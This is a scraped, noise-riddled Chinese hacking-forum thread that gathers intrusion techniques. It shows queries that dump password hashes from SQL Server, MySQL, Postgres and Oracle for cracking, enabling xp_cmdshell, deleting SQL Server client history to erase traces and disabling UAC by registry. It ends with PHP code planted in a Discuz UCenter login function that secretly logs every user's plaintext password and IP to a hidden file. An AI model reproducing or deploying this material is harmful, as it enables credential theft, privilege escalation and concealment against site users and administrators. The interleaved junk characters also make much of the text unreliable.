;antian365.asp;antian365.jpg' M# V7 u; R7 ~! Y9 x
( T5 S2 p+ r* K- ^0 U8 v各种类型数据库抓HASH破解最高权限密码!
( m1 |8 f/ t( A' r! q/ t1 b' n4 \1.sql server2000. w! @% V/ }' j) Q
SELECT password from master.dbo.sysxlogins where name='sa'
1 } g3 b4 _/ n9 @' a- W5 V: b& ?( ]0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503412 \+ G3 Z1 g1 \, {# d7 f8 V
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
& ^4 E: |! r. S# u4 U, U; d6 \5 J+ k+ e! A5 k4 Y! T
0×0100- constant header
9 K4 m: y C1 K, j7 q9 c34767D5C- salt
# z3 Y. j" ]" p @6 L0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash" K$ X7 i; v% T. S9 ]" ^
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash1 h$ T% ?8 S% K- r' D
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash; _# q% _ S0 }
SQL server 2005:-
$ @5 v5 v7 g+ y( G5 HSELECT password_hash FROM sys.sql_logins where name='sa'
; n2 J! ~( m* d1 R5 ~/ x% g+ ?0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F& `; C7 y6 S0 G
0×0100- constant header- c. N; H6 B9 B% N
993BF231-salt2 v- M6 O. c, |; D* q
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
~3 I- E2 i; Z& X! w- [crack case sensitive hash in cain, try brute force and dictionary based attacks.. r: ~0 W5 h4 H* ?7 x! @" B* d
' W* ]' q1 n9 a9 @: Z" e' Iupdate:- following bernardo’s comments:-
: V) N6 L( _; U! V& X% juse function fn_varbintohexstr() to cast password in a hex string.- H4 H% q. ]4 F3 t3 ^ s! w
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins0 \0 q l- B- O7 C) s
* J2 R' r4 s, H$ i% X) @, C4 N1 H
MYSQL:-8 j8 v0 e! }& {( m( c9 R
& @) h) w7 G! Y+ _/ {+ q3 O4 ^In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.# |0 ~( H4 h$ G6 ?# e' X4 l1 y0 I+ Z
5 \4 @/ K4 Q# B3 E0 {9 U*mysql < 4.11 v) m! ]5 D Y( L& m& H
) e. C. D8 i2 Y5 P6 r! t9 l
mysql> SELECT PASSWORD(‘mypass’);
j( W; L( b4 m* q3 r# n+——————–+' X7 a; j/ s! X$ p
| PASSWORD(‘mypass’) |+ ^" p- c- T& G% @" q5 |
+——————–+
: i6 o/ O6 P& ^9 x' g| 6f8c114b58f2ce9e |0 D1 @+ q# e( A: i: w- e. V
+——————–+
5 W# `: L+ y- K* f
1 G3 M( b* u* D! p*mysql >=4.1! p k4 i/ g% w! m
a" R8 Q: n1 Y& y# m8 |" Lmysql> SELECT PASSWORD(‘mypass’);
6 W2 W! K% q7 E1 }$ C, W+——————————————-+
2 H$ N+ m; A, p- n: r| PASSWORD(‘mypass’) |
9 G& X9 a, b9 V x( r' `+——————————————-+
# \# V2 a) I) V| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |& k; j, L, y. C f/ c5 R+ L
+——————————————-+9 W2 U! E k3 a( L% I' L
; j$ n6 \$ W; t3 SSelect user, password from mysql.user) d' b3 U4 R0 T! ], I- X
The hashes can be cracked in ‘cain and abel’7 a. E6 B& ` K' I1 @% e+ Z% u2 G( {
; U' i; S; h4 @5 z3 cPostgres:-, ?# m5 z2 ]" l6 u" @' b
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)! |3 r" a% f' V7 }" I8 K
select usename, passwd from pg_shadow;
% ^6 n9 c+ L; {( vusename | passwd
/ J M0 R: P+ [——————+————————————-" C6 v* a3 O) A. N+ R; H
testuser | md5fabb6d7172aadfda4753bf0507ed4396( E! u0 D- U4 Y: K4 n7 P
use mdcrack to crack these hashes:-/ v$ G) l) R, m. [ k* ]5 M$ P
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396! @* _- ~: I" i) Q! [: d5 a3 c
! o2 j9 x7 C; J0 u. @$ v! P5 u
Oracle:-4 _# q! C1 Q! j7 w; q& `$ V3 `
select name, password, spare4 from sys.user$
2 |: `1 A, C5 L0 Hhashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
: j; f: o, T" v5 B! g4 O+ ~8 R% LMore on Oracle later, i am a bit bored….
% k+ y: Q' N0 E: p
+ [' Z' W$ W8 B/ x7 B
: O) e! G/ H. ]# C3 v6 M6 G在sql server2005/2008中开启xp_cmdshell
* S% t. }3 l& d-- To allow advanced options to be changed.
! s. m" ~* W& A% ~& `( F' pEXEC sp_configure 'show advanced options', 1
2 M$ k' P1 d+ S3 f1 E, FGO
2 f! G& m3 } q8 ]0 Q. h% F-- To update the currently configured value for advanced options.* ^. `4 i# }- I6 f7 Q
RECONFIGURE
/ R/ d' Q! c3 RGO* h% m4 }/ c+ o2 B. G7 A
-- To enable the feature.
( i7 U, ^8 i. l! QEXEC sp_configure 'xp_cmdshell', 19 \9 x6 N. u! X! z
GO9 \8 k, x' U/ y. M5 x
-- To update the currently configured value for this feature.& l% x7 d+ b/ S* x# s! v8 S
RECONFIGURE% O# j2 i/ D+ F* z0 ~% D5 \
GO0 j6 g4 ^4 C- c, P" g
SQL 2008 server日志清除,在清楚前一定要备份。
. R! ?% \2 P% d/ _* r* G1 i# P- h" V如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:: V( q3 z" L: }
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
' U6 m( p4 F. i* b9 S+ |) t. M6 f5 [+ ]
对于SQL Server 2008以前的版本:% m) x% [# u5 L% U, I
SQL Server 2005:
; Q+ l7 W7 [- y# ], _删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat( W H2 R. q; R4 r) w
SQL Server 2000:1 ?7 K9 Y$ ~4 j# s) c3 q) [
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
4 z2 r3 t: F" p5 H# [# Y) O/ q. {, N% z0 N
8 ^8 p: |) |! T- S! P% O$ @1 r本帖最后由 simeon 于 2013-1-3 09:51 编辑
8 `$ F) I% r" ~' e9 Z& M) K0 \
0 c! e5 X [4 K- X: w( {4 ~windows 2008 文件权限修改
. m6 m' t. p6 K: i* A1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx! H" c, a0 A* t' s7 d
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
8 |1 F' K# y/ l, ]3 _1 h8 x一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,! R x0 |' D0 h, p
3 K) v" m1 |+ f+ [& q
Windows Registry Editor Version 5.00+ o. Z' j& D% b/ Y- A) N* U
[HKEY_CLASSES_ROOT\*\shell\runas]& Y4 O) y% t2 V
@="管理员取得所有权": V1 m2 t# H# \/ Y. W9 X$ H& _: u
"NoWorkingDirectory"=""
# u( I8 P N ^4 Q3 I% T4 v[HKEY_CLASSES_ROOT\*\shell\runas\command]
3 o( x* A8 c/ ?. V@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"" X9 w$ |4 Y/ [1 [9 u% u
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
" ?0 W/ q4 T, U- G7 c$ Q" H$ n[HKEY_CLASSES_ROOT\exefile\shell\runas2]
j( b; t6 w; W) ]+ g@="管理员取得所有权"
: ?/ P5 m% s! p3 \1 G6 N"NoWorkingDirectory"=""" G2 e/ k: B4 s0 h* }
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
: O' {8 f0 h4 i8 s@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
) }; U4 t( l; B"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"' M$ p* i, K: X2 f! R! `3 J
/ s* M, p G! ]
[HKEY_CLASSES_ROOT\Directory\shell\runas]
: y' E# t5 d5 l3 G@="管理员取得所有权"
9 M. f0 {5 W9 ?8 U! m"NoWorkingDirectory"=""
: p1 {& N5 {% E. `) x# ]) e( u[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
2 s1 D% E; m9 N' J" A6 H@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t", D0 q9 w* F7 y4 u* m; f
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"$ e: P1 u0 ?4 U& u/ r
; K" x! y6 x, W5 x: H" N
+ q U. n5 b3 i. g
win7右键“管理员取得所有权”.reg导入$ X R( o! v( k
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
' U" H/ I* f5 O# S1、C:\Windows这个路径的“notepad.exe”不需要替换
K E, o# S7 X1 P1 a2、C:\Windows\System32这个路径的“notepad.exe”不需要替换/ R8 F3 ^7 S! ?7 O' J/ u
3、四个“notepad.exe.mui”不要管
6 D# W( }! {- b6 c! h6 T( s4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和( m) E8 Z4 _5 C) t- p8 e" i: d& K5 H
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”/ U& F/ F% l0 {; H0 f$ S
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
, F; p0 B$ k+ T$ G) Q$ Z替换完之后回到桌面,新建一个txt文档打开看看是不是变了。) }' D2 e0 U" J& S1 l; ?
windows 2008中关闭安全策略: & g8 U4 y& S8 W% w8 U' t5 ]$ h0 e/ \% d
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f s* W$ C4 Y X
修改uc_client目录下的client.php 在7 j% p* b5 o" D0 [! G* W M
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
: k* Z; ]# R" x. h0 `' T% X下加入如上代码,在网站./data/cache/目录下自动生成csslog.php" [1 q7 U6 Z: V- p, H9 f* I. H
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw Q$ H; T" K! ^
if(getenv('HTTP_CLIENT_IP')) {, y# h. |+ J) b
$onlineip = getenv('HTTP_CLIENT_IP');
/ W- `8 ?6 S7 M5 m- X9 a# P} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
1 o, w" [2 v: D1 S/ r$onlineip = getenv('HTTP_X_FORWARDED_FOR');
( I5 S1 f! v7 r3 }} elseif(getenv('REMOTE_ADDR')) {
- w0 P# n8 E0 ~$onlineip = getenv('REMOTE_ADDR');
8 t, ?7 s1 f# e/ z} else {* H3 v* l: S* {. l1 U: ?2 G' n
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR']; `* P; E; ?- _3 P, x
}8 O# E5 T1 f0 m5 \, L- G; t
$showtime=date("Y-m-d H:i:s");
; E9 g$ b% W2 j( M5 _& F' J% \ $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
$ x% t/ W* J3 B! y2 ~ $handle=fopen('./data/cache/csslog.php','a+');
( |9 z4 b9 v. R4 g. { $write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对